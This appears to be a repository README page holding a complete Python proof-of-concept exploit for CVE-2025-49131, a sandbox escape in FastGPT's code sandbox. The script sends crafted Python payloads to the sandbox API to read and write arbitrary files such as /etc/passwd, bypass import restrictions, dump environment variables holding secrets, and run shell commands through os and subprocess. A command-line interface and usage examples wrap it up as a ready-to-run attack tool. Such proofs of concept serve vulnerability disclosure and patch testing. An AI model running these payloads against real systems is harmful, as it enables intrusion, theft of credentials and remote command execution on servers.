README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept
========================================================
Vulnerability: Sandbox Escape via insufficient isolation
Affected: FastGPT fastgpt-sandbox < 4.9.11
CVSS: 6.3 (Medium)
Impact: Read/Write arbitrary files, bypass Python import restrictions
Author: Security Research
Date: 2025-12-30
"""
import argparse
import requests
import json
import base64
import sys
from typing import Optional, Dict, Any
# Colors for output
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
RESET = '\033[0m'
BOLD = '\033[1m'
def banner():
print(f"""{Colors.RED}
███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
█████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║
██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║
██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.YELLOW}
███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝
╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗
███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.GREEN}
███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗
██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝
█████╗ ███████╗██║ ███████║██████╔╝█████╗
██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝
███████╗███████║╚██████╗██║ ██║██║ ███████╗
╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝
{Colors.CYAN}╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-49131 | CVSS 6.3 (Medium) ║
║ FastGPT Sandbox Container Escape ║
║ Affected: < v4.9.11 ║
║ Impact: File R/W, Import Bypass, Remote Code Execution ║
╚═══════════════════════════════════════════════════════════╝{Colors.RESET}
""")
class FastGPTSandboxExploit:
"""FastGPT Sandbox Escape Exploit Class"""
def __init__(self, target: str, verbose: bool = False):
self.target = target.rstrip('/')
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
def log(self, msg: str, level: str = 'info'):
"""Log messages with color"""
colors = {
'info': Colors.BLUE,
'success': Colors.GREEN,
'error': Colors.RED,
'warning': Colors.YELLOW
}
if self.verbose or level in ['success', 'error']:
print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}")
def check_target(self) -> bool:
"""Check if target is reachable"""
try:
resp = self.session.get(f"{self.target}/health", timeout=10)
return resp.status_code == 200
except Exception as e:
self.log(f"Target unreachable: {e}", 'error')
return False
def detect_vulnerability(self) -> Dict[str, Any]:
"""Non-destructive vulnerability detection"""
self.log("Checking for CVE-2025-49131 vulnerability...", 'info')
# Detection payload - tries to access __builtins__
detection_payloads = [
{
"code": "str(type(__builtins__))",
"description": "Builtins access check"
},
{
"code": "str(dir())",
"description": "Global namespace check"
}
]
results = {
"vulnerable": False,
"version": "unknown",
"details": []
}
for payload in detection_payloads:
try:
result = self.execute_code(payload["code"])
if result and "error" not in result.lower():
results["details"].append({
"test": payload["description"],
"result": "passed",
"output": result[:100]
})
results["vulnerable"] = True
except Exception as e:
results["details"].append({
"test": payload["description"],
"result": "blocked",
"error": str(e)
})
return results
def execute_code(self, code: str) -> Optional[str]:
"""Execute code in the sandbox"""
payload = {
"code": code,
"variables": {}
}
try:
resp = self.session.post(
f"{self.target}/api/sandbox/run",
json=payload,
timeout=30
)
if resp.status_code == 200:
data = resp.json()
return data.get("result", data.get("output", str(data)))
else:
self.log(f"Request failed: {resp.status_code}", 'error')
return None
except Exception as e:
self.log(f"Execution error: {e}", 'error')
return None
def read_file(self, filepath: str) -> Optional[str]:
"""
Read arbitrary file via sandbox escape
Uses multiple bypass techniques
"""
self.log(f"Attempting to read: {filepath}", 'info')
# Multiple file read payloads
payloads = [
# Direct open
f"open('{filepath}', 'r').read()",
# Builtins bypass
f"__builtins__.open('{filepath}').read()",
# Lambda wrapper
f"(lambda: open('{filepath}').read())()",
# Getattr bypass
f"getattr(__builtins__, 'open')('{filepath}').read()",
# Code object manipulation
f"exec('result=open(\"{filepath}\").read()') or result",
]
for i, payload in enumerate(payloads, 1):
self.log(f"Trying payload {i}/{len(payloads)}...", 'info')
try:
result = self.execute_code(payload)
if result and "error" not in result.lower() and "traceback" not in result.lower():
self.log(f"Success with payload {i}!", 'success')
return result
except Exception as e:
self.log(f"Payload {i} failed: {e}", 'warning')
continue
self.log("All file read payloads failed", 'error')
return None
def write_file(self, filepath: str, content: str) -> bool:
"""
Write arbitrary file via sandbox escape
"""
self.log(f"Attempting to write to: {filepath}", 'info')
# Escape content for Python string
escaped_content = content.replace('\\', '\\\\').replace("'", "\\'")
payloads = [
f"open('{filepath}', 'w').write('{escaped_content}')",
f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')",
]
for i, payload in enumerate(payloads, 1):
try:
result = self.execute_code(payload)
if result:
self.log(f"File write successful!", 'success')
return True
except Exception as e:
self.log(f"Payload {i} failed: {e}", 'warning')
continue
self.log("All file write payloads failed", 'error')
return False
def import_bypass(self, module: str) -> Optional[str]:
"""
Bypass import restrictions
"""
self.log(f"Attempting to import: {module}", 'info')
payloads = [
# Direct import
f"__import__('{module}')",
# Builtins import
f"__builtins__.__import__('{module}')",
# Importlib
f"__import__('importlib').import_module('{module}')",
# Exec import
f"exec('import {module}')",
# Dict access
f"__builtins__.__dict__['__import__']('{module}')",
]
for i, payload in enumerate(payloads, 1):
try:
result = self.execute_code(payload)
if result and "error" not in result.lower():
self.log(f"Import bypass successful with payload {i}!", 'success')
return result
except Exception as e:
continue
self.log("All import bypass payloads failed", 'error')
return None
def get_env(self) -> Optional[Dict]:
"""Get environment variables"""
self.log("Attempting to read environment variables...", 'info')
payloads = [
"__import__('os').environ.copy()",
"dict(__import__('os').environ)",
]
for payload in payloads:
try:
result = self.execute_code(payload)
if result:
return result
except:
continue
return None
def rce_chain(self, command: str) -> Optional[str]:
"""
Attempt full RCE via various chains
"""
self.log(f"Attempting RCE chain with command: {command}", 'info')
payloads = [
# os.system
f"__import__('os').system('{command}')",
# os.popen
f"__import__('os').popen('{command}').read()",
# subprocess
f"__import__('subprocess').check_output('{command}', shell=True).decode()",
# subprocess with Popen
f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()",
]
for i, payload in enumerate(payloads, 1):
try:
result = self.execute_code(payload)
if result:
self.log(f"RCE successful with method {i}!", 'success')
return result
except Exception as e:
self.log(f"RCE method {i} failed: {e}", 'warning')
continue
self.log("All RCE payloads failed", 'error')
return None
def main():
banner()
parser = argparse.ArgumentParser(
description='CVE-2025-49131 - FastGPT Sandbox Escape POC',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python poc.py --target http://localhost:3001 --detect
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --rce "id"
"""
)
parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL')
parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)')
parser.add_argument('--read', '-r', help='File path to read')
parser.add_argument('--write', '-w', help='File path to write')
parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write')
parser.add_argument('--import', '-i', dest='import_module', help='Module to import')
parser.add_argument('--env', '-e', action='store_true', help='Read environment variables')
parser.add_argument('--rce', help='Command to execute (RCE)')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
parser.add_argument('--output', '-o', help='Output file for results')
args = parser.parse_args()
exploit = FastGPTSandboxExploit(args.target, args.verbose)
results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []}
if args.detect:
print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}")
detect_result = exploit.detect_vulnerability()
results["detection"] = detect_result
if detect_result["vulnerable"]:
print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
else:
print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}")
print(json.dumps(detect_result, indent=2))
if args.read:
print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}")
content = exploit.read_file(args.read)
if content:
print(f"{Colors.GREEN}[+] File content:{Colors.RESET}")
print("-" * 50)
print(content)
print("-" * 50)
results["actions"].append({"type": "read", "file": args.read, "success": True, "content": content[:500]})
else:
results["actions"].append({"type": "read", "file": args.read, "success": False})
if args.write:
print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}")
success = exploit.write_file(args.write, args.content)
results["actions"].append({"type": "write", "file": args.write, "success": success})
if success:
print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}")
if args.import_module:
print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}")
result = exploit.import_bypass(args.import_module)
results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)})
if result:
print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}")
if args.env:
print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}")
env = exploit.get_env()
if env:
print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}")
print(env)
results["actions"].append({"type": "env", "success": True})
if args.rce:
print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}")
output = exploit.rce_chain(args.rce)
if output:
print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}")
print("-" * 50)
print(output)
print("-" * 50)
results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output})
else:
results["actions"].append({"type": "rce", "command": args.rce, "success": False})
if args.output:
with open(args.output, 'w') as f:
json.dump(results, f, indent=2)
print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}")
print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}")
if __name__ == "__main__":
main()